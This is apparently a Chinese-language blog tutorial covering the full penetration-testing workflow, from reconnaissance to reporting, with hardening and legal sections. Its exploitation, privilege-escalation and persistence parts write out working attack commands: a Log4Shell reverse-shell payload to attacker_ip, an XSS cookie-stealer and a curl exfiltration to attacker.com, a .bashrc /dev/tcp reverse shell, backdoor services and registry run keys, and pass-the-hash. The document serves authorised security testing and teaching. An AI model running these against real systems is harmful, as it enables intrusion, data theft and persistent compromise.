1896 字
5 分钟
系统安全与渗透测试实战
安全团队在例行渗透测试中发现,一个不起眼的测试环境 API 端点竟然暴露了生产数据库的连接凭据——攻击者只需要一个 HTTP 请求就能完成从测试环境到生产数据库的完整入侵链路。
渗透测试(Penetration Testing)是经授权的安全评估方法,通过模拟攻击者的视角发现系统中的安全漏洞。渗透测试的核心方法论遵循 PTES(Penetration Testing Execution Standard)标准,包含七个阶段:前期交互、信息收集、威胁建模、漏洞分析、渗透攻击、后渗透攻击和报告编写。
本文从实战角度出发,覆盖渗透测试全流程中的关键技术与工具使用,并结合 OWASP Top 10(2021)对常见漏洞进行分类讲解。
flowchart LR
A[前期交互] --> B[信息收集]
B --> C[威胁建模]
C --> D[漏洞分析]
D --> E[渗透攻击]
E --> F[后渗透]
F --> G[报告编写]
一、信息收集
信息收集是渗透测试的基础阶段,直接影响后续攻击路径的质量。信息收集分为被动收集(不与目标直接交互)和主动收集(直接探测目标)两种方式。
1.1 被动信息收集
被动信息收集通过公开渠道获取目标信息,不会触发目标的安全告警。
WHOIS 与域名信息
# WHOIS 查询 — 获取域名注册人、注册商、DNS 服务器等信息whois example.com
# 查询特定 WHOIS 服务器whois -h whois.verisign-grs.com example.com
# DNS 记录收集dig example.com ANY # 查询所有记录类型dig example.com MX +short # 邮件服务器dig example.com TXT +short # TXT 记录(SPF、DKIM 等)nslookup -type=any example.com
# DNS 区域传送尝试(配置不当的 DNS 服务器可能泄露全部记录)dig axfr example.com @ns1.example.com子域名枚举
子域名枚举可以发现目标的隐藏服务和内部系统入口:
# amass — 被动+主动子域名枚举(OSINT 集成)amass enum -passive -d example.com # 纯被动模式amass enum -brute -d example.com # 暴力破解模式amass enum -active -d example.com -o results.txt
# subfinder — 快速被动子域名发现subfinder -d example.com -all -o subdomains.txt
# 利用证书透明度日志(Certificate Transparency)# 通过 crt.sh 查询 SSL 证书中暴露的子域名curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sort -u搜索引擎利用(Google Dorking)
通过搜索引擎的高级语法发现敏感信息:
# 常用 Google Dork 语法site:example.com intitle:"admin" # 查找后台页面site:example.com filetype:pdf # 查找 PDF 文件site:example.com inurl:login # 查找登录页面site:example.com intext:"password" # 页面中包含 password 关键词site:github.com "example.com" password # GitHub 泄露的密码inurl:/wp-admin/ site:example.com # WordPress 后台网络空间搜索引擎
# Shodan — 搜索联网设备# 搜索特定端口和服务shodan search "hostname:example.com"shodan host 1.2.3.4
# Fofa — 国产网络空间搜索引擎# 搜索语法: title="后台管理" && domain="example.com"1.2 主动信息收集
主动信息收集会直接与目标系统交互,可能触发安全告警系统。
端口扫描(Nmap)
Nmap 是最强大的网络扫描工具,支持多种扫描技术:
# 基础扫描nmap -sV -sC -p- example.com # 全端口扫描 + 服务版本检测 + 默认脚本nmap -A -T4 example.com # 综合扫描(OS 检测、版本、脚本、traceroute)
# SYN 半开扫描(隐蔽扫描,需要 root 权限)sudo nmap -sS -p 22,80,443,3306,8080 example.com
# UDP 扫描(较慢,但可以发现 DNS、SNMP 等服务)sudo nmap -sU --top-ports 100 example.com
# 绕过防火墙的扫描技巧nmap -f example.com # 分片扫描nmap --data-length 32 example.com # 添加随机数据nmap -D RND:10 example.com # 伪造源地址(decoy scanning)
# 输出结果nmap -sV -oX scan_results.xml example.com # XML 格式输出nmap -sV -oA scan_results example.com # 所有格式输出Nmap 脚本引擎(NSE)提供丰富的漏洞检测脚本:
# 漏洞扫描脚本nmap --script vuln example.com
# 特定漏洞检测nmap --script http-sql-injection example.com # SQL 注入检测nmap --script ssl-heartbleed example.com # Heartbleed 漏洞nmap --script http-brute example.com # HTTP 暴力破解Web 目录扫描
# gobuster — 快速目录/文件爆破gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txtgobuster dir -u http://example.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,bak
# ffuf — 灵活的模糊测试工具ffuf -w wordlist.txt -u http://example.com/FUZZffuf -w users.txt:USER -w pass.txt:PASS -u http://example.com/login -d "user=USER&pass=PASS" -fc 401
# dirsearch — Python 编写的目录扫描工具dirsearch -u http://example.com -e php,html,js -t 50二、漏洞扫描
2.1 OWASP Top 10 与漏洞分类
OWASP Top 10(2021 版)定义了 Web 应用最常见的安全风险:
| 排名 | 漏洞类型 | 说明 | 检测工具 |
|---|---|---|---|
| A01 | 权限控制失效 | 越权访问、IDOR | Burp Suite、ZAP |
| A02 | 加密机制失效 | 弱加密、传输明文 | testssl.sh、SSLyze |
| A03 | 注入攻击 | SQL/NoSQL/命令注入 | sqlmap、Burp Suite |
| A04 | 不安全设计 | 业务逻辑漏洞 | 人工审计 |
| A05 | 安全配置错误 | 默认配置、敏感信息泄露 | nikto、nuclei |
| A06 | 过时组件 | 使用有漏洞的依赖 | OWASP Dependency-Check |
| A07 | 身份认证失败 | 弱密码、会话管理不当 | Hydra、Burp Suite |
| A08 | 数据完整性失败 | 不安全的反序列化 | Burp Suite |
| A09 | 日志与监控不足 | 攻击无法被追溯 | 人工评估 |
| A10 | SSRF | 服务端请求伪造 | Burp Suite、ffuf |
2.2 Web 漏洞扫描工具
| 工具 | 用途 | 特点 |
|---|---|---|
| nikto | Web 服务器扫描 | 全面 CVE 检查、配置审计 |
| sqlmap | SQL 注入检测 | 自动检测和利用、支持多种数据库 |
| nuclei | 漏洞模板扫描 | 快速 POC 验证、社区模板丰富 |
| Burp Suite | 综合渗透平台 | 代理拦截、扫描、重放、Intruder |
| OWASP ZAP | 综合渗透平台 | 开源免费、自动化扫描 |
2.3 漏扫实战命令
# nikto — Web 服务器全面扫描nikto -h http://example.com -o nikto_report.htmlnikto -h https://example.com -ssl -Tuning 1234567890 # 启用所有测试类型nikto -h http://example.com -C all # 启用所有 CGI 检测
# sqlmap — SQL 注入自动化检测# GET 参数注入sqlmap -u "http://example.com/product?id=1" --batch --dbs# POST 参数注入sqlmap -u "http://example.com/login" --data="username=admin&password=test" --batch# 从 Burp Suite 请求文件导入sqlmap -r request.txt --batch --dbs# 获取数据库表和数据sqlmap -u "http://example.com/product?id=1" -D dbname --tablessqlmap -u "http://example.com/product?id=1" -D dbname -T users --dump
# nuclei — 基于模板的漏洞扫描nuclei -u http://example.com -t vulnerabilities -o nuclei_report.jsonnuclei -u http://example.com -t cves/2023/ -severity critical,high# 更新模板库nuclei -update-templates2.4 Burp Suite 使用
Burp Suite 是 Web 渗透测试的核心工具,主要功能包括:
代理拦截(Proxy):拦截浏览器和服务器之间的 HTTP/HTTPS 请求,可以修改请求和响应内容。
# 配置步骤:1. 设置浏览器代理指向 127.0.0.1:80802. 安装 Burp CA 证书(访问 http://burp/cert 下载)3. 在 Proxy -> Intercept 中启用拦截4. 在 HTTP history 中查看所有请求重放器(Repeater):手动修改和重发请求,用于逐个测试参数的漏洞:
# SQL 注入测试示例:原始请求: id=1测试 1: id=1' # 单引号测试测试 2: id=1 AND 1=1 # 布尔注入测试 3: id=1 UNION SELECT NULL,NULL-- # 联合查询注入Intruder(入侵者):自动化攻击模块,支持暴力破解和模糊测试:
# 暴力破解登录:1. 捕获登录请求2. 标记用户名和密码参数3. 加载字典文件4. 设置匹配规则(如 "Login failed" 为失败标志)5. 开始攻击三、漏洞利用
3.1 Metasploit 框架
Metasploit 是最流行的渗透测试框架,提供数千个漏洞利用模块和辅助功能。
# 启动 Metasploit 控制台msfconsole
# 数据库初始化(首次使用)db_init
# 搜索模块search type:exploit name:smb # 搜索 SMB 相关 exploitsearch cve:2017-0144 # 按 CVE 编号搜索search platform:windows type:exploit # Windows 平台 exploit
# 使用 EternalBlue(MS17-010)漏洞利用示例use exploit/windows/smb/ms17_010_eternalblueshow options # 查看所需参数set RHOSTS target_ip # 目标 IPset PAYLOAD windows/x64/meterpreter/reverse_tcpset LHOST attacker_ip # 攻击者 IPexploit # 执行攻击
# Meterpreter 后渗透命令sysinfo # 系统信息getuid # 当前用户getsystem # 尝试提权到 SYSTEMhashdump # 导出密码哈希screenshot # 截屏webcam_snap # 拍照(如有摄像头)upload /local/file C:\\target\\path # 上传文件download C:\\target\\file /local/path # 下载文件3.2 常见高危漏洞利用
| 漏洞 | CVE | 影响范围 | 利用工具 | 攻击类型 |
|---|---|---|---|---|
| EternalBlue | CVE-2017-0144 | Windows SMBv1 | Metasploit | RCE |
| Log4Shell | CVE-2021-44228 | Apache Log4j 2.x | JNDIExploit | RCE |
| Spring4Shell | CVE-2022-22965 | Spring Framework | PoC 脚本 | RCE |
| ProxyLogon | CVE-2021-26855 | Microsoft Exchange | ProxyLogon 脚本 | RCE |
| PrintNightmare | CVE-2021-34527 | Windows Print Spooler | Metasploit | 提权+RCE |
Log4Shell(CVE-2021-44228)实战示例
Log4Shell 是 2021 年最严重的漏洞之一,影响所有使用 Apache Log4j 2.x 的 Java 应用:
# 1. 启动 JNDI 注入服务器(攻击者机器)java -jar JNDIExploit.jar -i attacker_ip -l 1389
# 2. 构造恶意 payload(发送到目标应用)# 在 HTTP 请求头中注入:User-Agent: ${jndi:ldap://attacker_ip:1389/Basic/ReverseShell/attacker_ip/4444}
# 3. 监听反弹 shellnc -lvnp 4444
# 4. 目标服务器解析日志时触发 JNDI 查询,连接攻击者的 LDAP 服务器# 5. LDAP 返回恶意 Java 类,在目标服务器执行反弹 shell弱口令爆破
# Hydra — 在线密码爆破工具# SSH 爆破hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://target_ip -t 4
# HTTP POST 表单爆破hydra -l admin -P pass.txt target_ip http-post-form "/login:user=^USER^&pass=^PASS^:Login failed"
# FTP 爆破hydra -l admin -P pass.txt ftp://target_ip
# Medusa — 并行登录爆破medusa -h target_ip -u admin -P pass.txt -M ssh -t 43.3 Web 应用漏洞利用
SQL 注入(A03: Injection)
# 手动检测 SQL 注入# 1. 单引号测试http://example.com/product?id=1' # 如果返回 SQL 错误,存在注入点
# 2. 布尔盲注http://example.com/product?id=1 AND 1=1 # 正常返回http://example.com/product?id=1 AND 1=2 # 异常返回
# 3. 时间盲注http://example.com/product?id=1 AND SLEEP(5)-- # MySQLhttp://example.com/product?id=1; WAITFOR DELAY '0:0:5'-- # MSSQL
# 4. UNION 注入 — 获取数据库信息http://example.com/product?id=1 UNION SELECT 1,2,3--http://example.com/product?id=1 UNION SELECT version(),database(),user()--
# 5. sqlmap 自动化利用sqlmap -u "http://example.com/product?id=1" --batch --dbs --technique=BEUSTXSS(跨站脚本攻击)
# 反射型 XSS 测试 payload<script>alert('XSS')</script><img src=x onerror=alert('XSS')><svg onload=alert('XSS')>
# 存储型 XSS — 在输入框中注入(如评论、用户名)<script>document.location='http://attacker.com/steal?c='+document.cookie</script>
# DOM 型 XSS — 利用 JavaScript DOM 操作http://example.com/page#<img src=x onerror=alert('XSS')>SSRF(服务端请求伪造)
# 探测内网服务http://example.com/fetch?url=http://127.0.0.1:8080http://example.com/fetch?url=http://169.254.169.254/latest/meta-data/ # AWS 元数据
# 利用 file 协议读取本地文件http://example.com/fetch?url=file:///etc/passwd四、权限提升
4.1 Linux 提权
获取初始 shell 后,提权是后渗透阶段的核心任务。
信息收集
# 系统基本信息uname -a # 内核版本cat /etc/*-release # 发行版信息arch # 系统架构
# 用户和权限信息whoami # 当前用户id # 用户 ID 和组sudo -l # sudo 权限配置cat /etc/passwd # 用户列表cat /etc/shadow # 密码哈希(需要 root)
# 查找 SUID 文件(以 root 权限执行的程序)find / -perm -4000 -type f 2>/dev/null# 常见可利用的 SUID 程序: nmap, vim, find, bash, python, less, more
# 查找可写文件和目录find / -writable -type d 2>/dev/nullfind / -name "*.sh" -writable 2>/dev/null
# 查看计划任务cat /etc/crontabls -la /etc/cron.*crontab -l自动化提权扫描
# linPEAS — 最全面的 Linux 提权检查脚本curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# linux-exploit-suggester — 基于内核版本推荐提权漏洞perl linux-exploit-suggester.pl
# pspy — 无需 root 权限监控进程(可以发现定时任务执行的其他进程)./pspy64常见提权方法
# 1. SUID 提权 — 利用 find 命令find / -name "target" -exec /bin/sh \;
# 2. sudo 配置不当提权# 如果 sudo -l 显示可以无密码执行某些命令sudo vim -c '!sh' # Vim 逃逸sudo find / -exec /bin/sh \; # Find 逃逸sudo python3 -c 'import os; os.system("/bin/sh")'
# 3. 内核漏洞提权(Dirty COW — CVE-2016-5195 为例)# 适用于 Linux 内核 < 4.8.3gcc -pthread dirty.c -o dirty -lcrypt./dirty password
# 4. Capabilities 提权getcap -r / 2>/dev/null# 如果发现 /usr/bin/python3 = cap_setuid+eppython3 -c 'import os; os.setuid(0); os.system("/bin/sh")'4.2 Windows 提权
# 系统信息收集systeminfo # 系统版本和补丁信息wmic qfe get Caption,Description,HotFixID,InstalledOn # 已安装补丁列表
# 用户信息whoami /all # 当前用户详细信息net user # 用户列表net localgroup administrators # 管理员组成员
# 自动化提权工具# winPEAS — Windows 提权检查脚本winPEASx64.exe quiet cmd fast
# Watson — 基于补丁信息推荐提权漏洞Watson.exe
# PowerUp — PowerShell 提权脚本Import-Module PowerUp.ps1Invoke-AllChecks常见 Windows 提权路径
# 1. 服务配置不当# 查找可写服务路径accesschk.exe /accepteula -uwcqv "Authenticated Users" *
# 2. AlwaysInstallElevated — MSI 文件以 SYSTEM 运行reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedreg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# 3. 存储的凭据cmdkey /list # 查看存储的凭据runas /savecred /user:admin cmd.exe # 使用存储凭据
# 4. Token Impersonation(令牌模拟)# 使用 Incognito 模块load incognitolist_tokens -uimpersonate_token "NT AUTHORITY\SYSTEM"五、后渗透与持久化
5.1 持久化技术
持久化确保攻击者在系统重启后仍能维持访问权限。
Linux 持久化
# 1. SSH 公钥注入echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keyschmod 600 /root/.ssh/authorized_keys
# 2. Crontab 定时任务(crontab -l; echo "*/5 * * * * /tmp/backdoor") | crontab -
# 3. 系统服务后门# 创建 systemd 服务cat > /etc/systemd/system/backdoor.service << EOF[Unit]Description=System Service
[Service]ExecStart=/tmp/backdoorRestart=always
[Install]WantedBy=multi-user.targetEOFsystemctl enable backdoor
# 4. Bash Profile 后门echo 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1 &' >> ~/.bashrcWindows 持久化
# 1. 注册表启动项reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\temp\backdoor.exe"
# 2. 计划任务schtasks /create /tn "SystemUpdate" /tr "C:\temp\backdoor.exe" /sc onstart /ru SYSTEM
# 3. 服务创建sc create backdoor binPath= "C:\temp\backdoor.exe" start= auto5.2 横向移动
# 1. SSH 隧道 — 端口转发# 本地端口转发(访问内网服务)ssh -L 8080:internal_host:80 user@jump_host
# 动态端口转发(SOCKS 代理)ssh -D 1080 user@jump_host# 配合 proxychains 使用proxychains nmap -sT -Pn internal_network/24
# 2. Pass-the-Hash(哈希传递攻击)# 使用 impacket 工具包python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 admin@target_ip
# 3. Meterpreter 路由# 在 Metasploit 中添加路由route add 192.168.1.0 255.255.255.0 session_id# 然后可以扫描和攻击内网5.3 数据外泄防护
渗透测试中需要证明可以获取敏感数据,但实际外泄需要注意合规性:
# 1. 数据打包(Linux)tar czf /tmp/data.tar.gz /path/to/sensitive/data/
# 2. 通过 HTTP/HTTPS 传输curl -X POST -F "file=@/tmp/data.tar.gz" https://attacker.com/upload
# 3. 通过 DNS 隧道(防火墙严格时)# 使用 dnscat2 或 iodine六、防御加固
6.1 Linux 系统加固
| 配置项 | 加固建议 | 具体操作 |
|---|---|---|
| SSH | 禁用密码登录、使用密钥 | PasswordAuthentication no |
| 防火墙 | 最小端口开放 | ufw default deny && ufw allow 22/tcp |
| 权限 | 最小权限原则 | 定期审计 sudo 配置 |
| 更新 | 及时安全补丁 | apt update && apt upgrade |
| 审计 | 启用日志审计 | 安装 auditd、配置 syslog |
| 内核 | 启用安全模块 | 启用 SELinux/AppArmor |
SSH 加固配置
# /etc/ssh/sshd_config 安全配置Port 2222 # 修改默认端口PermitRootLogin no # 禁止 root 远程登录PasswordAuthentication no # 禁用密码认证PubkeyAuthentication yes # 启用密钥认证MaxAuthTries 3 # 最大认证尝试次数AllowUsers deploy admin@192.168.1.0/24 # 限制用户和来源 IP
# 安装 fail2ban 防止暴力破解apt install fail2bansystemctl enable fail2ban# /etc/fail2ban/jail.local# [sshd]# enabled = true# maxretry = 3# bantime = 3600文件系统安全
# 查找并修复危险权限find / -perm -777 -type f 2>/dev/null # 全局可写文件find / -perm -4000 -type f 2>/dev/null # SUID 文件find / -perm -2000 -type f 2>/dev/null # SGID 文件
# 关键文件不可变chattr +i /etc/passwd /etc/shadow
# 安全挂载选项# /etc/fstab — 为 /tmp 添加 noexec, nosuid/dev/sda2 /tmp ext4 defaults,noexec,nosuid,nodev 0 06.2 Web 应用加固
Nginx 安全配置
# 安全响应头add_header X-Frame-Options "SAMEORIGIN";add_header X-Content-Type-Options "nosniff";add_header X-XSS-Protection "1; mode=block";add_header Content-Security-Policy "default-src 'self'; script-src 'self' 'unsafe-inline'";add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
# 隐藏版本信息server_tokens off;
# 禁止访问敏感文件location ~* /\.(git|svn|env|htaccess) { deny all; return 404;}
# 限制上传目录执行权限location /uploads/ { location ~* \.php$ { deny all; }}
# 速率限制防止暴力破解limit_req_zone $binary_remote_addr zone=login:10m rate=5r/m;location /login { limit_req zone=login burst=5 nodelay; proxy_pass http://backend;}输入验证与参数化查询
# Python — 使用参数化查询防止 SQL 注入import sqlite3
# 错误方式(存在 SQL 注入)cursor.execute(f"SELECT * FROM users WHERE id = {user_input}")
# 正确方式(参数化查询)cursor.execute("SELECT * FROM users WHERE id = ?", (user_input,))
# 输出编码防止 XSSfrom markupsafe import escapesafe_output = escape(user_input)6.3 容器安全
# Docker 安全最佳实践# 1. 使用非 root 用户docker run -u 1000:1000 image_name
# 2. 只读文件系统docker run --read-only image_name
# 3. 限制资源docker run --memory="512m" --cpus="1.0" image_name
# 4. 禁止特权模式# 避免 --privileged 标志# 使用 --cap-drop ALL --cap-add NET_BIND_SERVICE 代替
# 5. 镜像安全扫描docker scout cves image_nametrivy image image_name6.4 入侵检测与日志监控
# 安装和配置 OSSEC/Wazuh(主机入侵检测)# 实时文件完整性监控# Rootkit 检测# 活动响应(自动封禁恶意 IP)
# 关键日志文件/var/log/auth.log # SSH 和认证日志/var/log/syslog # 系统日志/var/log/apache2/ # Web 服务器日志/var/log/nginx/ # Nginx 日志
# 实时监控日志中的异常tail -f /var/log/auth.log | grep -i "failed password"journalctl -f -u sshd | grep -i "invalid"七、渗透测试报告
渗透测试报告是交付物中最重要的一环,一份专业报告应包含以下内容:
7.1 报告结构
1. 执行摘要(管理层阅读) - 测试范围和时间 - 关键发现概述 - 风险等级统计
2. 技术详情(技术团队阅读) - 测试方法论 - 详细漏洞列表 - 复现步骤(截图 + 命令) - 影响分析
3. 修复建议 - 按优先级排序 - 具体修复方案 - 参考链接
4. 附录 - 测试工具版本 - 完整漏洞列表7.2 风险等级定义
| 等级 | CVSS 评分 | 说明 | 示例 |
|---|---|---|---|
| 严重 | 9.0-10.0 | 可被远程利用,导致系统完全控制 | RCE、SQL 注入获取管理员 |
| 高危 | 7.0-8.9 | 可导致敏感数据泄露或权限提升 | 权限提升漏洞、SSRF |
| 中危 | 4.0-6.9 | 有限影响,需要特定条件 | 反射型 XSS、信息泄露 |
| 低危 | 0.1-3.9 | 影响极小 | 内部 IP 泄露、版本信息暴露 |
| 信息 | 0.0 | 无安全影响,但建议改进 | 缺少安全头、TLS 配置 |
八、法律与合规
渗透测试必须在明确授权的范围内进行,未经授权的渗透测试行为属于违法行为。
# 渗透测试授权要素:1. 书面授权文件(渗透测试授权书)2. 测试范围明确(IP 段、域名、应用)3. 时间窗口约定4. 紧急联系人5. 测试限制(不可破坏数据、不可影响业务连续性)相关法律法规:
- 《中华人民共和国网络安全法》
- 《中华人民共和国数据安全法》
- 《中华人民共和国个人信息保护法》
- 《信息安全技术 网络安全等级保护基本要求》(等保 2.0)
九、参考资料
- OWASP Top 10 (2021) — Web 应用安全风险 Top 10
- PTES 渗透测试执行标准 — 渗透测试方法论标准
- Metasploit 官方文档 — 渗透测试框架使用指南
- Nmap 参考指南 — 网络扫描工具手册
- HackTricks — 渗透测试技巧大全
- GTFOBins — Unix 二进制文件提权利用
- LOLBAS — Windows 系统二进制文件利用
- PayloadsAllTheThings — Web 攻击 payload 集合
- MITRE ATT&CK — 攻击技术与防御知识库
- CVSS 计算器 — 漏洞严重程度评分
参考
支持与分享
如果这篇文章对你有帮助,欢迎支持作者或分享给更多人
部分信息可能已经过时
相关文章 智能推荐
1
工具系列导读
工具 开发者工具箱——涵盖版本控制、容器技术、构建系统、Linux 运维与安全测试,助你打造高效的开发运维工作流。
2
综合实战:构建 eBPF 网络安全工具
eBPF 综合实战——从零构建 eBPF 网络安全工具——XDP 防 DDoS + TC 流量控制 + LSM 进程监控,运用前 17 章知识解决真实安全问题。
3
论构建系统、流水线与现代工程实践
工具 从 make 的诞生讲起,梳理构建系统五十年的演化历程——探讨 CMake、Ninja、Bazel 等现代工具的核心设计理念,以及高效构建流水线的工程实践。
4
SSH 从入门到实践
工具 系统介绍 SSH 协议的历史演变、握手流程与 OpenSSH 的完整使用指南,涵盖客户端配置、公钥认证、端口转发、ssh-agent 密钥托管及服务端配置。
5
Git 进阶与团队协作
工具 深入解析 Git 进阶技巧与团队协作——分支策略、代码审查、GitOps 与高级命令。